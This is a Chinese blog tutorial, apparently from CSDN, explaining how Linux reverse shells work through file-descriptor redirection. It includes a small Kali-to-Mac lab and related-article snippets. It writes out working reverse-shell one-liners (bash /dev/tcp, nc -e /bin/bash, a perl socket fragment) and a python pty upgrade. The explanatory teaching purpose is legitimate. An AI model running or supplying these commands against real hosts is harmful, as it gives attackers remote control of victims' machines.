linux+反弹shell原理,linux反弹shell的原理详解

最新推荐文章于 2024-04-26 17:22:55 发布
最新推荐文章于 2024-04-26 17:22:55 发布
阅读量242 收藏
点赞数
文章标签: linux+反弹shell原理

完整命令

反弹shell命令:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

bash -i > /dev/tcp/ip/port 0>&1 2>&1

利用nc反弹shell:

nc -lvvp 12345 -t -e /bin/bash

原理

bash -i > /dev/tcp/ip/port 0>&1 2>&1

bash -i 打开一个交互式的bash

&是为了区分文件1和文件描述符1的

a>&b 的意思是 a>b 2>&1

0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口跟攻击机的shell口。这命令的意思也可以理解为,将攻击机窗口的输入当作靶机窗口的输入最终输入给靶机。2代表标准错误输出。

实验

通过一个小实验帮助大家理解

第一步,将shell的正确输出重定向到外部主机

假设我们在kali上输入的命令为:

bash -i > /dev/tcp/192.168.124.1/9999,这句话的意思是将交互式shell的标准输出重定向到192.168.124.1的9999端口。

在mac上监听端口命令为:nc -l 9999

7932442dc8be3e310b3246c051de8dd1.png

首先在kali上输入whoami命令,发现没有回显,因为回显被重定向到了mac上。

58bd7610147f217aadaa6f479c342184.png

但是当我们在kali上出入错误命令的时候,却存在回显。

73b36a5b23da8225af0623e5ebbd4dd0.png

第二步,将错误输出重定向到外部主机

我们只需要在上面的命令后面加上 2>&1即可,意思为将错误输出重定向到标准输出上,也就是重定向到我们的外部主机。

40405a214deccc9d5ee67095c2cae356.png

这时候发现在kali上按键盘已经没有任何回显了,回显全部出现在了mac的shell上:

d4ae848427ea145d2cf3050c46b9bcc1.png

这是因为我们已经将所有的输出都重定向到了外部主机上,但问题是现在我们的控制权还在kali上,mac无法进行任何输出操作,只能显示输出。这时候我们几句需要将输入的权限给予我们的mac。

第三步,交出输入权限

只需要在第二步命令的基础上加上 0>&1即可。

66972cc3d7281b96b44df9dfda31fdb2.png

这时候已经可以在mac上完全控制kali的shell了,实验结束。

其他

当shell不稳定时候用python的虚拟化终端:

python -c "import pty;pty.spawn('/bin/bash')"

到此这篇关于linux反弹shell的原理详解的文章就介绍到这了,更多相关linux反弹shell内容请搜索我们以前的文章或继续浏览下面的相关文章希望大家以后多多支持我们!

时间: 2020-10-14

weixin_39778582
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux反弹shell原理浅析
黑锤的博客
08-14 760
反弹shell文件描述符与重定向 在这里最难理解的就是文件描述符和重定向这两部分 先来讲一下linux的文件描述符,什么是文件描述符, 在linux系统中将所有设备都当做文件来处理,而linux文件描述符用来标识每个文件对象,在我理解中就是描述符用来指定对象的,这样才能井然有序的运行。在linux系统中就连输入设备和输出设备都被当成是文件来处理就拿显示器和键盘输入都拿来当成文件处理,他们都有...
linux下的shell反弹
ITgougou_的博客
10-27 267
linux下的shell反弹设计重定向,文件描述符等内容 01 linux的文件描述符 可以理解为linux跟踪打开文件,而分配的一个数字,这个数字有点类似c语言操作文件时候的句柄,通过句柄就可以实现文件的读写操作。 当Linux启动的时候会默认打开三个文件描述符,分别是: 标准输入standard input 0 (默认设备键盘) 标准输出standard output 1(默认设备显示器) 错误输出:error output 2(默认设备显示器) 下面引用先知社区对文件描述符的脑涂:.
Linux反弹shell命令语句解析
Lee_Natuo的博客
12-07 861
Linux反弹shell命令语句 语句格式 bash -i >& /dev/tcp/[ip]/[port] 0>&1 bash -i 打开bash &后面跟 /dev/tcp/[ip]/[port] (相当于>&后面接文件)将bash的标准输出和标准错误输出传递到远
【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1
qq_37092496的博客
03-15 8977
文章目录 前言 为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1 常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(
反弹shell原理
最新发布
m0_63615772的博客
04-26 1575
假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标IP:目标端口),这是比较常规的形式,我们叫做正向连接。远程桌面,ssh,web服务,smb等等那么什么情况下正向连接不太好用了?(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。它的IP会动态改变,你不能持续控制。(2)由于防火墙或局域网的限制,对方机器只能发送请求,不能主动请求。
Linux渗透之反弹Shell命令解析
deeplearnings的博客
08-18 9859
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 B
命令执行漏洞
qq_42307546的博客
01-20 1477
命令执行漏洞也称为rce,当应用调用一些外部程序就会用到一些系统命令的函数,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,就会造成命令执行漏洞 相关函数 system(args)有回显 passthru(args)有c exec(args)回显最后一行-必须echo输出 shell_exec()无回显必须输出 代码分析 <?php /** * Created by runner.han * There is nothing new under the sun */
linux反弹shell原理
weixin_44255856的博客
07-30 287
一直知道Linux反弹shell。但是不知道其原理所以今天学习了一波。 文件描述符 首先我们要明白文件描述符是什么? 文件描述符定义:文件描述符在形式上是一个非负整数。实际上,它是一个索引值,指向内核为每一个进程所维护的该进程打开文件的记录表。当程序打开一个现有文件或者创建一个新文件时,内核向进程返回一个文件描述符。在程序设计中,一些涉及底层的程序编写往往会围绕着文件描述符展开。但是文件描述符这一...
linux反弹shell原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
浅析Linux之bash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
linuxshell的工作原理
08-30
"linuxshell的工作原理" Linux操作系统中的shell是用户和系统之间的接口,提供了命令语言、命令解释程序及程序设计语言的统称。shell是一个命令语言解释器,拥有自己内建的shell命令集,shell也能被系统中其他...
linux 反弹脚本,linux反弹shell原理详解
weixin_36219012的博客
04-30 289
完整命令反弹shell命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shell:nc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&a...
Windows各种版本上传shell写法
qq_52612931的博客
08-17 243
#bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 #perl版本: perl -e ‘use Socket;i="10.0.0.1";i="10.0.0.1";i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in(p,inetaton(p,inet_aton(p,ineta​ton(i)))){o
Linux反弹shell原理
YkingH的博客
03-10 1427
Linux反弹shell原理-bash shell是一种脚本语言,需要用解释器来解析这些脚本,常见的脚本解释器有: bash-Linux标准默认的shell sh-Unix标准默认的shell shellLinux的外壳,为用户和内核之间的交互提供了一个接口 反弹shell就是控制端监听在某TCP端口,别控端发起请求到该端口,并将其命令行的输入输出转到控制端 bash建立反弹shell bash -i >& /dev/tcp/攻击端IP/攻击端监听端口 0>&1 bash
学习远程命令执行漏洞笔记
qq_56426046的博客
08-30 1806
以上是我学习完远程命令执行漏洞的学习心得和笔记,望自己能坚持下去。
【转】Linux之bash反弹shell原理浅析
mastergu2的博客
11-04 2200
    环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142   过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp...
window反弹shell
mingyqf的博客
02-16 1156
1.nc反弹shell 远程服务器 nc 监听命令 nc -vlnp 8080 受害者反弹 shell 命令,每种语言都有 sock 连接命令,可以根据不通过的环境,选择合适的命令。 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 2.powershell反弹cmd powercat是netcat的powershell版本 所以可以放在可被访问的远程服务器上。执行命令的时候,自动下载执行。 http://192.168.0.195/powercat
shell原理
qq_28576837的博客
06-23 1103
shell原理

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值